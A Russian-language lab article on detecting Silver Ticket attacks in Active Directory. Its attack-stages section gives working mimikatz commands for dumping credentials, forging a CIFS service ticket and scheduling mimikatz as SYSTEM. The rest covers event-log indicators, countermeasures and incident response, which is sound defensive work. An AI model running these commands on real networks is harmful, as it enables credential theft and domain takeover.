Обнаружение атаки Silver Ticket

Обнаружение

Подобно атаки Golden Ticket , атака Silver Ticket включает в себя компрометацию учетных данных и злоупотребление структурой протокола Kerberos . Однако, в отличие от Золотого билета, который предоставляет злоумышленнику неограниченный доступ к домену, Серебряный билет позволяет злоумышленнику только подделывать билеты службы выдачи билетов (TGS) для определенных служб. Билеты TGS шифруются хэшем пароля для сервиса. Поэтому, если злоумышленник украдет хэш для служебной учетной записи, он может создать билеты TGS для этой службы.

Объект атакиActive Directory
Приложенияmimikatz
Тактика ATT&CKCredential Access
Техника ATT&CKT1558.002
Сложность
Обнаружение
5 /5
Противодействие
5 /5
Реагирование
4 /5
Итого
4.7
Виртуальные машиныWindows 10 (192.168.56.111)
Windows Server 2019 (192.168.56.113)
Учетные записиusertest — пользователь без административных привилегий
adadmin — администратор домена
Настройки журналированияРасширенные настройки аудита windows
Sysmon
Wireshark

Данная статья носит исключительно ознакомительный характер и не является руководством к действию.

Этапы атаки

Раскрытие хэша учетной записи компьютера

#Windows mimikatz - выгрузка NTLM учетной записи рабочей станции WIN-KJOFE29AB0E (контролер домена) под пользователем adadmin

mimikatz.exe “privilege::debug” “sekurlsa::logonpasswords” exit
Обнаружение атаки Silver Ticket

Получение SID домена

#Windows

whoami /user
Обнаружение атаки Silver Ticket

Формирование поддельного билета

#Windows mimikatz - создает серебряный билет для службы CIFS

kerberos::golden /domain:home.local /sid:S-1-5-21-2509495909-1219801760-1757532611 /id:1107 /ptt /target:win-kjofe29AB0e.home.local /service:CIFS /rc4:d9e5fd1440d5c7a03bf30240e4b9b336 /user:newservice
Обнаружение атаки Silver Ticket
#PowerShell - проверяем командой klist, что билет для службы CIFS создан

klist
Обнаружение атаки Silver Ticket
#Windows mimikatz - запускаем команду misc::cmd, чтобы запустить cmd в контексте созданного билета и выполняем успешное подключение к контролеру домена

misc::cmd
Обнаружение атаки Silver Ticket

Доступные службы Silver Tickets

Вариант использованияслужбы Silver Tickets
WMIHOST
RPCSS
удаленный запуск PowerShellHOST
HTTP
WinRMHOST
HTTP
Scheduled TasksHOST
Windows File Share, также psexecCIFS
операции LDAP, включая DCSyncLDAP
Средства удаленного администрирования WindowsRPCSS
LDAP
CIFS

Обнаружение

КоммуникацияИсточникКомандаМестоИнформация
Windows 10 (192.168.56.111) -> Windows Server 2019 (192.168.56.113)Destination host Windows Server 2019 (192.168.56.113)Служба CIFS:
dir \win-kjofe29AB0e\c$
Event log — Security
Event ID: 4624
Security ID: HOME\Administrator Account Name: newservice
Account Domain: home.local
Event ID: 4672
Security ID: HOME\Administrator
Account Name: newservice
Служба HOST:
schtasks /create /S home.local /SC weekly /RU «NT Authority\System» /TN «SomeTaskName» /TR «C:\test\mimikatz-masetr\mimikatz-master\x64\mimikatz.exe»
Event log — SecurityEvent ID: 4624
Security ID: HOME\usertest
Account Name: newservice
Account Domain: home.local
Event ID: 4672
Security ID: HOME\usertest
Account Name: newservice
Event ID: 4702
Security ID: HOME\usertest
Account Name: newservice

Критерии для правил корреляции

Атака Silver Ticket сложна в обнаружении автоматизированными средствами, необходимо выполнить аналитику нескольких косвенных признаков, которые могут быть легитимными.

Наилучший способ обнаружения серебряных билетов — это отслеживать события безопасности Windows на рабочих станциях, серверах и контроллерах домена на предмет событий входа/выхода из системы с аномалиями в поле домена и пользователя, например:

  • Имена пользователей, которых не существует
  • Несоответствие имени пользователя и идентификатора
Обнаружение атаки Silver Ticket
Билет создан с несуществующим SID и пользователем

Событие Event ID 4624:

Не совпадает Security ID и Account Name. Поле Account Domain написано в нижнем регистре.

Обнаружение атаки Silver Ticket
CIFS
Обнаружение атаки Silver Ticket
HOST

Событие Event ID 4672:

Не совпадает Security ID и Account Name.

Обнаружение атаки Silver Ticket
CIFS
Обнаружение атаки Silver Ticket
HOST

Событие Event ID 4702:

Не совпадает Security ID и Account Name.

Обнаружение атаки Silver Ticket
HOST

Проверка срока жизни выпущенного билета:

Срок жизни билета превышает максимальное значение для домена (по умолчанию срок действия составляет 10 часов, но, например, mimikatz выпускает на 10 лет).

Сетевой трафик:

Отсутствуют TGT и TGS запросы, так как злоумышленник формирует билет самостоятельно на собственной локальной машине, поэтому сразу отправляет сформированный TGS.

Противодействие

  • Пароли для учетных записей служб, локальных администраторов и администраторов домена должны генерироваться случайным образом, содержать не менее 30 символов и регулярно меняться
  • Проверка имен пользователей, которые отсутствуют в Active Directory

Реагирование

  • Активируйте процесс реагирования на инциденты и предупредите группу реагирования на инциденты
  • Поместите в карантин любые затронутые компьютеры (например, хост, отправивший билет на обслуживание) для проведения анализа, устранения и восстановления
  • Заменить пароль для администраторов домена и скомпрометированной учетной записи службы

Источники:

https://adsecurity.org/?p=2011


Файлы логов:

  • CIFS.evtx— события Windows Server 2019 (192.168.56.113)
  • CIFS.pcap — сетевой трафик Windows Server 2019 (192.168.56.113)
  • HOST.evtx— события Windows Server 2019 (192.168.56.113)
  • HOST.pcap — сетевой трафик Windows Server 2019 (192.168.56.113)

События:

  • 16.05.2023 в 14:56:48 CIFS.evtx — вход в систему под несуществующим пользователем и SID
  • 16.05.2023 в 15:27:55 HOST.evtx — вход в систему под несуществующим пользователем и SID

Скачать архив

jethacker
Оцените автора
( Пока оценок нет )
jethacker.ru
Добавить комментарий